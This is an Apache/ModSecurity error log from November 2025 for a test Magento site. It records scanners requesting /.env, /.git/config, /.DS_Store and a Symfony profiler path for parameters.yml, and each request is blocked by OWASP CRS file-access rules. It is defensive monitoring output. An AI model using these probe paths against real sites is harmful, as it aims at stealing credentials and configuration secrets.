[Mon Nov 03 01:36:24.303260 2025] [:error] [pid 3966419] [client 139.59.143.102:34548] [client 139.59.143.102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQf5CAV07IBDLooEoB9WvgAAAAA"]
[Mon Nov 03 01:36:24.415089 2025] [:error] [pid 3967828] [client 139.59.143.102:34562] [client 139.59.143.102] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQf5CPXFI6FbQdr335aLSgAAAAk"]
[Mon Nov 03 01:36:24.415338 2025] [:error] [pid 3967828] [client 139.59.143.102:34562] [client 139.59.143.102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQf5CPXFI6FbQdr335aLSgAAAAk"]
[Mon Nov 03 01:36:24.415506 2025] [:error] [pid 3967828] [client 139.59.143.102:34562] [client 139.59.143.102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQf5CPXFI6FbQdr335aLSgAAAAk"]
[Mon Nov 03 01:43:37.963899 2025] [authz_core:error] [pid 3966361] [client 138.68.86.32:35406] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Nov 03 01:43:38.224534 2025] [:error] [pid 3966358] [client 138.68.86.32:35454] [client 138.68.86.32] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQf6upsUVa6Dv8nfxsQNhwAAAA0"]
[Mon Nov 03 01:43:38.224753 2025] [:error] [pid 3966358] [client 138.68.86.32:35454] [client 138.68.86.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQf6upsUVa6Dv8nfxsQNhwAAAA0"]
[Mon Nov 03 01:43:38.224902 2025] [:error] [pid 3966358] [client 138.68.86.32:35454] [client 138.68.86.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQf6upsUVa6Dv8nfxsQNhwAAAA0"]
[Mon Nov 03 01:43:38.279823 2025] [:error] [pid 3966437] [client 138.68.86.32:35462] [client 138.68.86.32] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQf6uojFo9YA5S9TpgJoxgAAAAM"]
[Mon Nov 03 01:43:38.280034 2025] [:error] [pid 3966437] [client 138.68.86.32:35462] [client 138.68.86.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQf6uojFo9YA5S9TpgJoxgAAAAM"]
[Mon Nov 03 01:43:38.280186 2025] [:error] [pid 3966437] [client 138.68.86.32:35462] [client 138.68.86.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQf6uojFo9YA5S9TpgJoxgAAAAM"]
[Mon Nov 03 01:43:38.333334 2025] [:error] [pid 3968007] [client 138.68.86.32:35470] [client 138.68.86.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQf6urbITckG2fdmMGMYWAAAAAI"]
[Mon Nov 03 01:43:38.333586 2025] [:error] [pid 3968007] [client 138.68.86.32:35470] [client 138.68.86.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQf6urbITckG2fdmMGMYWAAAAAI"]
[Mon Nov 03 01:43:38.333757 2025] [:error] [pid 3968007] [client 138.68.86.32:35470] [client 138.68.86.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQf6urbITckG2fdmMGMYWAAAAAI"]
[Tue Nov 04 17:29:04.465168 2025] [authz_core:error] [pid 3995847] [client 159.89.127.165:52326] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Nov 04 17:29:05.637607 2025] [:error] [pid 3994255] [client 159.89.127.165:52362] [client 159.89.127.165] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQop0baYVzkTXsy-aN777wAAAAQ"]
[Tue Nov 04 17:29:05.637842 2025] [:error] [pid 3994255] [client 159.89.127.165:52362] [client 159.89.127.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQop0baYVzkTXsy-aN777wAAAAQ"]
[Tue Nov 04 17:29:05.638005 2025] [:error] [pid 3994255] [client 159.89.127.165:52362] [client 159.89.127.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQop0baYVzkTXsy-aN777wAAAAQ"]
[Tue Nov 04 17:29:05.995160 2025] [:error] [pid 3994252] [client 159.89.127.165:52364] [client 159.89.127.165] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQop0R4BRonkgYkRvhvRQgAAAAE"]
[Tue Nov 04 17:29:05.995361 2025] [:error] [pid 3994252] [client 159.89.127.165:52364] [client 159.89.127.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQop0R4BRonkgYkRvhvRQgAAAAE"]
[Tue Nov 04 17:29:05.995532 2025] [:error] [pid 3994252] [client 159.89.127.165:52364] [client 159.89.127.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQop0R4BRonkgYkRvhvRQgAAAAE"]
[Tue Nov 04 17:29:06.356505 2025] [:error] [pid 4003216] [client 159.89.127.165:52370] [client 159.89.127.165] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQop0oyLCgtgfSeY5cbDIwAAAAI"]
[Tue Nov 04 17:29:06.356715 2025] [:error] [pid 4003216] [client 159.89.127.165:52370] [client 159.89.127.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQop0oyLCgtgfSeY5cbDIwAAAAI"]
[Tue Nov 04 17:29:06.356878 2025] [:error] [pid 4003216] [client 159.89.127.165:52370] [client 159.89.127.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQop0oyLCgtgfSeY5cbDIwAAAAI"]
[Tue Nov 04 20:35:22.070073 2025] [authz_core:error] [pid 4009494] [client 165.227.39.235:48062] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Nov 04 20:35:23.388018 2025] [:error] [pid 4012589] [client 165.227.39.235:48092] [client 165.227.39.235] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQpVexlwakL7xofAUOk8AwAAAAY"]
[Tue Nov 04 20:35:23.388234 2025] [:error] [pid 4012589] [client 165.227.39.235:48092] [client 165.227.39.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQpVexlwakL7xofAUOk8AwAAAAY"]
[Tue Nov 04 20:35:23.388404 2025] [:error] [pid 4012589] [client 165.227.39.235:48092] [client 165.227.39.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQpVexlwakL7xofAUOk8AwAAAAY"]
[Tue Nov 04 20:35:23.798595 2025] [:error] [pid 4009524] [client 165.227.39.235:48100] [client 165.227.39.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQpVezN5HJozj73xCA4zPgAAABE"]
[Tue Nov 04 20:35:23.798813 2025] [:error] [pid 4009524] [client 165.227.39.235:48100] [client 165.227.39.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQpVezN5HJozj73xCA4zPgAAABE"]
[Tue Nov 04 20:35:23.798985 2025] [:error] [pid 4009524] [client 165.227.39.235:48100] [client 165.227.39.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQpVezN5HJozj73xCA4zPgAAABE"]
[Tue Nov 04 20:35:24.214145 2025] [:error] [pid 4012592] [client 165.227.39.235:48110] [client 165.227.39.235] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQpVfBnY5l8clIuVQOBivgAAAAo"]
[Tue Nov 04 20:35:24.214418 2025] [:error] [pid 4012592] [client 165.227.39.235:48110] [client 165.227.39.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQpVfBnY5l8clIuVQOBivgAAAAo"]
[Tue Nov 04 20:35:24.214611 2025] [:error] [pid 4012592] [client 165.227.39.235:48110] [client 165.227.39.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQpVfBnY5l8clIuVQOBivgAAAAo"]
[Thu Nov 06 15:36:28.403658 2025] [:error] [pid 4051152] [client 134.195.196.29:59924] [client 134.195.196.29] ModSecurity: Warning. Matched phrase "parameters.yml" at ARGS:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "96"] [id "930120"] [msg "OS File Access Attempt"] [data "Matched Data: parameters.yml found within ARGS:file: app/config/parameters.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aQyybERvqYFz4xL9hswUBgAAAAw"]
[Thu Nov 06 15:36:28.404168 2025] [:error] [pid 4051152] [client 134.195.196.29:59924] [client 134.195.196.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aQyybERvqYFz4xL9hswUBgAAAAw"]
[Thu Nov 06 15:36:28.404350 2025] [:error] [pid 4051152] [client 134.195.196.29:59924] [client 134.195.196.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aQyybERvqYFz4xL9hswUBgAAAAw"]
[Thu Nov 06 20:34:07.815480 2025] [authz_core:error] [pid 4062892] [client 138.68.86.32:59674] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Nov 06 20:34:08.492381 2025] [:error] [pid 4053627] [client 138.68.86.32:42636] [client 138.68.86.32] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQz4MAr2Q0n1crlMY4gyWwAAAAM"]
[Thu Nov 06 20:34:08.492618 2025] [:error] [pid 4053627] [client 138.68.86.32:42636] [client 138.68.86.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQz4MAr2Q0n1crlMY4gyWwAAAAM"]
[Thu Nov 06 20:34:08.492801 2025] [:error] [pid 4053627] [client 138.68.86.32:42636] [client 138.68.86.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQz4MAr2Q0n1crlMY4gyWwAAAAM"]
[Thu Nov 06 20:34:08.633359 2025] [:error] [pid 4061967] [client 138.68.86.32:42650] [client 138.68.86.32] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQz4MMxOA9xCcE2G5RBzLwAAAAI"]
[Thu Nov 06 20:34:08.633563 2025] [:error] [pid 4061967] [client 138.68.86.32:42650] [client 138.68.86.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQz4MMxOA9xCcE2G5RBzLwAAAAI"]
